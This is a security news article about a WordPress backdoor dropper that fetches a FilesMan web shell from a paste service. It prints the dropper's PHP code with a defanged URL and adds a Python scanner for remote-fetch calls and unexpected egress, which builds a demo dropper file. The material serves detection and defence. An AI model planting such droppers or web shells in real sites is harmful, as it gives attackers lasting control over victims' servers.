The malicious code allows attackers to reinfect websites

Sep 18, 2018 17:20 GMT  ·  By

Bruno Zanelato found a website backdoor which, unlike other siblings of its family, does not embed its code within a web page but loads it from an online clipboard service.

Website backdoors are specially devised malicious tools hidden within a website's code and designed to allow an attacker to reinfect the target and retain control even after the site has been cleaned.

"71% of all compromised targets had a PHP-based backdoor hidden within the site," says the expert's report. "The effectiveness of these backdoors comes from their elusiveness to most website scanning technologies."

Most malware tailored for websites and added to a web page's code uses obfuscation techniques to prevent website owners from discovering the true purpose and goal of the hidden code.

However, as described in Zanelato's blog post, the unusual backdoor he discovered does not try to hide in plain sight within the pages of the target website like many of its counterparts.

Instead, it adds a PHP file containing the payload downloader code to the website's directory structure, at wp-content/themes/buildup/db.php.

The backdoor downloads its payload from the paste.ee web-based paste service

The code listed below downloads the backdoor, which in turn grabs the malware that allows the attacker to reinfect the website at a later date.

```php
<?php
// Dropper found at wp-content/themes/buildup/db.php: it overwrites itself with
// whatever the paste service returns. The URL is kept defanged as reported;
// the "@" suppresses any PHP warning from the copy() call.
if ( @copy('hxxps://paste[.]ee/r/3TwsC/0', 'db.php') ) {
    echo "Copy_success";
} else {
    echo "Copy_failed";
}
?>
```
Once decrypted, the downloaded payload turned out to be the FilesMan backdoor, a "minimalist" web shell that lets threat actors access, modify and reinfect the website at any time after the initial compromise.

Websites can be "backdoored" regardless of the server or CMS they're using, with the help of exploits created for unpatched versions of Joomla, WordPress, and osCommerce, or via stolen authentication credentials.

Mitigating website backdoor attacks is a matter of keeping a close watch on your logs, always looking for things that seem out of place, such as outgoing connections to unknown servers.
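The two defensive checks the article points at, a sweep of the webroot for dropper files that fetch a remote URL (like the db.php above) and a review of egress logs for connections to unexpected hosts, can be scripted. The block below is an added example written for this page, not code from the article or from Sucuri; the function names, the list of paste hosts other than paste.ee, the allowlist of expected hosts, the egress log format and the sample files it creates are all constructed assumptions.

```python
import os
import re
import tempfile

# Added example: defender-side sweep for "minimalist" droppers such as the
# db.php described above, plus a check of egress logs for unexpected hosts.
# Function names, the paste-host list and the log format are assumptions.

# PHP calls that read or write remote content, followed by a literal URL.
REMOTE_FETCH = re.compile(
    r"\b(copy|file_get_contents|fopen|file_put_contents|curl_init)\s*\(\s*['\"]"
    r"(https?://[^'\"]+)['\"]",
    re.IGNORECASE,
)

# Paste services frequently abused to host second-stage payloads. paste.ee is
# the one named in the article; the other entries are assumptions.
PASTE_HOSTS = ("paste.ee", "pastebin.com", "hastebin.com")

# Hosts this (hypothetical) WordPress site is expected to talk to.
EXPECTED_EGRESS = {"api.wordpress.org", "downloads.wordpress.org"}


def scan_php_source(source: str) -> list:
    """Return one finding per remote fetch/write call found in PHP source."""
    findings = []
    for m in REMOTE_FETCH.finditer(source):
        func, url = m.group(1), m.group(2)
        host = url.split("/")[2].split(":")[0].lower()
        severity = "high" if host.endswith(PASTE_HOSTS) else "medium"
        findings.append({"function": func.lower(), "url": url,
                         "host": host, "severity": severity})
    return findings


def scan_tree(root: str) -> dict:
    """Walk a webroot and map each suspicious PHP file to its findings."""
    results = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if not name.lower().endswith((".php", ".phtml", ".inc")):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                findings = scan_php_source(fh.read())
            if findings:
                rel = os.path.relpath(path, root).replace(os.sep, "/")
                results[rel] = findings
    return results


def unexpected_egress(log_text: str, allowlist=EXPECTED_EGRESS) -> list:
    """Return (timestamp, host) for outbound connections not on the allowlist."""
    hits = []
    for line in log_text.splitlines():
        m = re.search(r"\bhost=(\S+)", line)
        if m and m.group(1).lower() not in allowlist:
            hits.append((line.split()[0], m.group(1).lower()))
    return hits


def build_demo_site() -> str:
    """Create a constructed webroot: one benign theme file, one dropper."""
    root = tempfile.mkdtemp(prefix="wp-demo-")
    theme = os.path.join(root, "wp-content", "themes", "buildup")
    os.makedirs(theme)
    with open(os.path.join(theme, "functions.php"), "w") as fh:
        fh.write("<?php\nadd_action('init', 'buildup_setup');\n")
    with open(os.path.join(theme, "db.php"), "w") as fh:
        # Constructed stand-in for the dropper; the paste ID is a placeholder.
        fh.write("<?php\nif ( @copy('https://paste.ee/r/PLACEHOLDER/0', 'db.php') ) {\n"
                 "  echo 'Copy_success';\n} else {\n  echo 'Copy_failed';\n}\n?>")
    return root


# Constructed egress log lines in a hypothetical "key=value" format.
DEMO_EGRESS_LOG = """\
2018-09-18T17:20:01Z www-data php-fpm OUT dst=203.0.113.10:443 host=api.wordpress.org
2018-09-18T17:20:05Z www-data php-fpm OUT dst=198.51.100.7:443 host=paste.ee
"""


if __name__ == "__main__":
    root = build_demo_site()
    for path, findings in scan_tree(root).items():
        for f in findings:
            print(f"{path}: {f['function']}() fetches {f['url']} [{f['severity']}]")
    for ts, host in unexpected_egress(DEMO_EGRESS_LOG):
        print(f"{ts}: unexpected outbound connection to {host}")
```

Run against a real webroot by calling scan_tree() on it instead of build_demo_site(); a legitimate plugin that fetches an update manifest will show up as "medium", so the allowlist and the paste-host list are the two knobs to tune for a given site.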

[Photo gallery: web backdoor; obfuscated malware downloader code; decrypted malware downloader code]